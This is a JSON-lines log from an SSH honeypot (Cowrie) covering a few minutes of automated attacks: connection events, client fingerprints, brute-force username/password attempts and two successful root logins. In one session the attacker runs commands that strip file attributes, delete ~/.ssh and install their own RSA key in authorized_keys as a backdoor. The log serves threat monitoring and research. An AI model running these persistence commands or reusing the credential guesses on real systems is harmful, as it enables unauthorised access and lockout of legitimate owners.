{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T07:01:03.366449Z","src_ip":"212.227.235.229","session":"97f0050b7f8f"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T07:01:04.378738Z","src_ip":"212.227.235.229","session":"97f0050b7f8f"}
{"eventid":"cowrie.session.closed","duration":"7.4","message":"Connection lost after 7.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:01:04.623856Z","src_ip":"212.227.235.229","session":"d8254bb7c27b"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:01:04.624676Z","src_ip":"212.227.235.229","session":"97f0050b7f8f"}
{"eventid":"cowrie.session.connect","src_ip":"118.26.39.178","src_port":50298,"dst_ip":"1.2.3.4","dst_port":22,"session":"7e2cc9229eed","protocol":"ssh","message":"New connection: 118.26.39.178:50298 (1.2.3.4:22) [session: 7e2cc9229eed]","sensor":"my-vps","timestamp":"2025-09-09T07:01:18.114496Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T07:01:18.115393Z","src_ip":"118.26.39.178","session":"7e2cc9229eed"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T07:01:18.321342Z","src_ip":"118.26.39.178","session":"7e2cc9229eed"}
{"eventid":"cowrie.login.failed","username":"sonar","password":"123","message":"login attempt [sonar/123] failed","sensor":"my-vps","timestamp":"2025-09-09T07:01:19.182058Z","src_ip":"118.26.39.178","session":"7e2cc9229eed"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:01:20.392229Z","src_ip":"118.26.39.178","session":"7e2cc9229eed"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":63922,"dst_ip":"1.2.3.4","dst_port":22,"session":"50ab8c0e08b9","protocol":"ssh","message":"New connection: 217.72.205.35:63922 (1.2.3.4:22) [session: 50ab8c0e08b9]","sensor":"my-vps","timestamp":"2025-09-09T07:01:22.186350Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:01:22.187521Z","src_ip":"217.72.205.35","session":"50ab8c0e08b9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50959,"dst_ip":"1.2.3.4","dst_port":22,"session":"4684c2e36fc7","protocol":"ssh","message":"New connection: 212.227.235.229:50959 (1.2.3.4:22) [session: 4684c2e36fc7]","sensor":"my-vps","timestamp":"2025-09-09T07:02:11.922053Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T07:02:11.923046Z","src_ip":"212.227.235.229","session":"4684c2e36fc7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T07:02:12.165814Z","src_ip":"212.227.235.229","session":"4684c2e36fc7"}
{"eventid":"cowrie.login.failed","username":"ahmad","password":"password1","message":"login attempt [ahmad/password1] failed","sensor":"my-vps","timestamp":"2025-09-09T07:02:13.177276Z","src_ip":"212.227.235.229","session":"4684c2e36fc7"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:02:14.422395Z","src_ip":"212.227.235.229","session":"4684c2e36fc7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39902,"dst_ip":"1.2.3.4","dst_port":22,"session":"b7ff545578ac","protocol":"ssh","message":"New connection: 212.227.235.229:39902 (1.2.3.4:22) [session: b7ff545578ac]","sensor":"my-vps","timestamp":"2025-09-09T07:02:29.042179Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T07:02:29.042918Z","src_ip":"212.227.235.229","session":"b7ff545578ac"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-09-09T07:02:29.282884Z","src_ip":"212.227.235.229","session":"b7ff545578ac"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35587,"dst_ip":"1.2.3.4","dst_port":22,"session":"95e4dfdf7e8e","protocol":"ssh","message":"New connection: 212.227.235.229:35587 (1.2.3.4:22) [session: 95e4dfdf7e8e]","sensor":"my-vps","timestamp":"2025-09-09T07:03:30.650581Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T07:03:30.651487Z","src_ip":"212.227.235.229","session":"95e4dfdf7e8e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T07:03:30.895210Z","src_ip":"212.227.235.229","session":"95e4dfdf7e8e"}
{"eventid":"cowrie.login.failed","username":"centos","password":"centos@123","message":"login attempt [centos/centos@123] failed","sensor":"my-vps","timestamp":"2025-09-09T07:03:31.911639Z","src_ip":"212.227.235.229","session":"95e4dfdf7e8e"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:03:33.159757Z","src_ip":"212.227.235.229","session":"95e4dfdf7e8e"}
{"eventid":"cowrie.session.connect","src_ip":"149.100.11.243","src_port":34190,"dst_ip":"1.2.3.4","dst_port":22,"session":"aed3dc375087","protocol":"ssh","message":"New connection: 149.100.11.243:34190 (1.2.3.4:22) [session: aed3dc375087]","sensor":"my-vps","timestamp":"2025-09-09T07:03:40.399440Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T07:03:40.400585Z","src_ip":"149.100.11.243","session":"aed3dc375087"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:03:40.449317Z","src_ip":"149.100.11.243","session":"aed3dc375087"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42456,"dst_ip":"1.2.3.4","dst_port":22,"session":"e8b57710659d","protocol":"ssh","message":"New connection: 212.227.235.229:42456 (1.2.3.4:22) [session: e8b57710659d]","sensor":"my-vps","timestamp":"2025-09-09T07:03:42.736902Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T07:03:42.737811Z","src_ip":"212.227.235.229","session":"e8b57710659d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T07:03:42.975121Z","src_ip":"212.227.235.229","session":"e8b57710659d"}
{"eventid":"cowrie.login.success","username":"root","password":"qaz!@#wsx","message":"login attempt [root/qaz!@#wsx] succeeded","sensor":"my-vps","timestamp":"2025-09-09T07:03:43.967812Z","src_ip":"212.227.235.229","session":"e8b57710659d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T07:03:44.504106Z","src_ip":"212.227.235.229","session":"e8b57710659d"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T07:03:44.504822Z","src_ip":"212.227.235.229","session":"e8b57710659d"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T07:03:44.505724Z","src_ip":"212.227.235.229","session":"e8b57710659d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:03:44.744432Z","src_ip":"212.227.235.229","session":"e8b57710659d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T07:03:45.237882Z","src_ip":"212.227.235.229","session":"e8b57710659d"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T07:03:45.238533Z","src_ip":"212.227.235.229","session":"e8b57710659d"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T07:03:45.479916Z","src_ip":"212.227.235.229","session":"e8b57710659d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:03:45.480757Z","src_ip":"212.227.235.229","session":"e8b57710659d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42462,"dst_ip":"1.2.3.4","dst_port":22,"session":"089a426dc184","protocol":"ssh","message":"New connection: 212.227.235.229:42462 (1.2.3.4:22) [session: 089a426dc184]","sensor":"my-vps","timestamp":"2025-09-09T07:03:45.692788Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T07:03:45.693683Z","src_ip":"212.227.235.229","session":"089a426dc184"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T07:03:45.906902Z","src_ip":"212.227.235.229","session":"089a426dc184"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T07:03:46.807953Z","src_ip":"212.227.235.229","session":"089a426dc184"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:03:48.026022Z","src_ip":"212.227.235.229","session":"089a426dc184"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38264,"dst_ip":"1.2.3.4","dst_port":22,"session":"009127233084","protocol":"ssh","message":"New connection: 212.227.235.229:38264 (1.2.3.4:22) [session: 009127233084]","sensor":"my-vps","timestamp":"2025-09-09T07:03:48.239761Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T07:03:48.240633Z","src_ip":"212.227.235.229","session":"009127233084"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T07:03:48.454859Z","src_ip":"212.227.235.229","session":"009127233084"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T07:03:49.353979Z","src_ip":"212.227.235.229","session":"009127233084"}
{"eventid":"cowrie.session.closed","duration":"6.8","message":"Connection lost after 6.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:03:49.571424Z","src_ip":"212.227.235.229","session":"e8b57710659d"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:03:49.572394Z","src_ip":"212.227.235.229","session":"009127233084"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:04:29.060987Z","src_ip":"212.227.235.229","session":"b7ff545578ac"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48445,"dst_ip":"1.2.3.4","dst_port":22,"session":"17aca3b53244","protocol":"ssh","message":"New connection: 212.227.235.229:48445 (1.2.3.4:22) [session: 17aca3b53244]","sensor":"my-vps","timestamp":"2025-09-09T07:04:45.125617Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T07:04:45.126520Z","src_ip":"212.227.235.229","session":"17aca3b53244"}
